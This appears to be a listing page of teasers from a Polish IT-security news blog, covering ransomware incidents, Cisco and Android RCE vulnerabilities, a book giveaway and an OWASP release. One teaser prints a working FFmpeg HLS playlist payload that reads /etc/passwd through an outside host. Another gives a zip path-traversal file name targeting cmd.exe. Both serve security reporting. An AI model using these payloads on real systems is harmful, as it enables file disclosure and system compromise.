Nagrody i zasady mamy podobne jak w ostatniej edycji (odpisujemy szybko tylko wygranym, tym którzy się spóźnili, postaramy się podrzucić małe nagrody pocieszenia). Zacznijmy od dóbr, które chcemy rozdać :-) Książka: bezpieczeństwo aplikacji www (sprzedanych mamy ponad 9000 egzemplarzy!) – do rozdania 20 sztuk. Gdyby ktoś chciał zakupić – recenzje tutaj….
Czytaj dalej »
Różne pluginy korzystają z wordpressowej funkcji unzip_file, która służy do zwykłego rozpakowywania zipów. Co może być groźnego w zwykłym rozpakowywaniu zipów? Wiele. Wyobraźmy sobie że dostajemy od kogoś archiwum zip i pracujemy z uprawnieniami admina. Rozpakowujemy zip-a i nagle mamy zabackdoorowany system. Jak? Ktoś umieścił w archiwum plik o nazwie: ../../../../../Windows\system32\cmd.exe…
Czytaj dalej »
Ludzie piszą o braku możliwości normalnego restartu lub zamknięcia Windowsów 7. W przypadku wystąpienia tego problemu pojawia się następujący komunikat: Istnieją metody umożliwiające obejście problemu, a my zastanawiamy się czy całość ma jakiś związek z zakończonym niedawno oficjalnym wsparciem dla systemu Windows 7… Niektórzy sugerują, że całość jest wynikiem ostatniej…
Czytaj dalej »
W dzisiejszym odcinku vulnz ciekawy przykład zastosowania kontrowersyjnej podatności Race Condition w świecie webowym. Kontrowersyjnej – bowiem wielu nie wierzy, że występuje ona w rzeczywistości. Zobaczmy więc konkretny, świeży przykład w serwisie reverb.com Autor badania na początek uzbroił się w Turbo Intruder – rozszerzenie do opisywanego w sekurakowej książce narzędzia…
Czytaj dalej »
Nie płaci się szantażystom? To była jedna z opcji rozważana przez władze uniwersytetu w Maastricht. Ransomware zaatakował pod koniec grudnia 2019 roku i wg relacji zaszyfrowane zostało prawie 300 serwerów: The ransomware attack itself occurred on December 23 2019, as the Clop ransomware was deployed to 267 Windows servers, encrypting all files and…
Czytaj dalej »
Jeśli ktoś choćby pobieżnie zna sprzęt Cisco, na pewno kojarzy protokół Cisco Discovery Protocol (CDP) – działa na switchach, routerach, telefonach IP… (w tych ostatnich w ogóle się nie da go wyłączyć). Tymczasem wykryto możliwość zdalnego wykonania kodu (RCE) – w wielu przypadkach jako root(!) i/lub DoS w takich urządzeniach: Cisco FXOS, IOS…
Czytaj dalej »
Kit to wirtualny pracownik oferowany przez platformę shopify. Nie dość że „pracuje za darmo” ;) to czasem pozwala nieźle zarobić. Tym razem zarobek został osiągnięty w dość niekonwencjonalny sposób. W pewnym miejscu można było do aplikacji zuploadować obrazek. Niektórzy z czytelników pomyślą – aha, w takim razie zamiast obrazka można…
Czytaj dalej »
Podatność umożliwia zdalnie wykonanie kod na atakowanym urządzeniu (z uprawnieniami wysoko uprawnionej usługi Bluetooth). Wystarczy tylko, że ofiara ma aktywowany Bluetooth, oraz jesteśmy w jego zasięgu. Podatne są Androidy 8.x, 9.x (być może również wcześniejsze). Na dziesiątce można „tylko” wykonać DoS – zdalnie zrestartować usługę odpowiedzialną za Bluetooth. On Android 8.0…
Czytaj dalej »
Zacznijmy od dóbr, które chcemy rozdać :-) Książka: bezpieczeństwo aplikacji www (sprzedanych mamy ponad 9000 egzemplarzy!) – do rozdania 20 sztuk Czarne t-shirty sekuraka (mamy tylko wersje męskie. Haftowane logo sekuraka) – do rozdania 20 sztuk rozmiar S M L XL XXL wzrost 168 176 182 185 188 obwód klatki piersiowej…
Czytaj dalej »
GEDIA to spora niemiecka firma działająca w branży motoryzacyjnej (dostarczają rozmaite komponenty) – mają fabryki na trzech kontynentach (również w Polsce). Niedawno dowiedzieliśmy, że firma została zainfekowana ransomware. Niby nic wielkiego, ale pojawiła się również groźba ujawnienia danych – w przypadku kiedy GEDIA nie zapłaci okupu. Nie zapłaciła – więc…
Czytaj dalej »
Kara nałożona na operatora telekomunikacyjnego TIM została oczywiście wyrażona w Euro (dokładna kwota to: 27,802,946) i dotyczyła licznych uchybień – w tym za wydzwanianie do ludzi z telefonicznym spamem – mimo wyraźnego sprzeciwu konkretnej osoby (ach, skąd my to znamy): (…) reception of unwanted promotional calls made without consent or despite…
Czytaj dalej »
Na pierwszy rzut oka ostatnia panika związana z nowym koronawirusem nie ma nic wspólnego z bezpieczeństwem IT. No ale na każdej panice niektórzy próbują się obłowić – niektórzy sprzedają maski ochronne na twarz w absurdalnych cenach, inni z kolei uruchamiają sklepy oferujące „szczepionkę” na 2019-nCoV: Cena jest niemała bo 0.1 BTC (~3700…
Czytaj dalej »
Nowe wydanie znanej nam dystrybucji wprowadza raczej kilka drobnych zmian i usprawnień, choć niektórzy brak domyślnego logowania na roota (root/toor) i przejście na niżej uprzywilejowanego (kali/kali) mogą traktować jako rewolucję. Ciekawostka to dostępność Kali Nethunter Rootless (edycja na smatfony), która nie wymaga roota (choć ma oczywiście pewne ograniczenia). Dodano też…
Czytaj dalej »
Opis wartego $2000 znaleziska można znaleźć tutaj. Przykładowy plik video wygląda np. tak: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST a cała magia dzieje się w trakcie konwersji, np.: ffmpeg -i podatny_plik.mp4 -o wynik.avi, która jest wykonywana automatycznie po uploadzie pliku od użytkownika. „Dziwna” zawartość pliku graficznego to użycie pewnej ciekawej funkcji…
Czytaj dalej »
Niedawno udostępniono wersję 1.0 nowej dokumentacji od OWASP – API Security Top Ten. Mamy tutaj 10 najczęstszych/najgroźniejszych klas podatności w API (REST-owych). Najwięcej miejsca poświęcono problemom związanym z uwierzytelnianiem / autoryzacją. Mamy również całkiem osobne, ciekawe przypadki jak choćby Mass Assignment czy tematykę Rate Limiting. Nie można też zapomnieć o całej klasyce…
Czytaj dalej »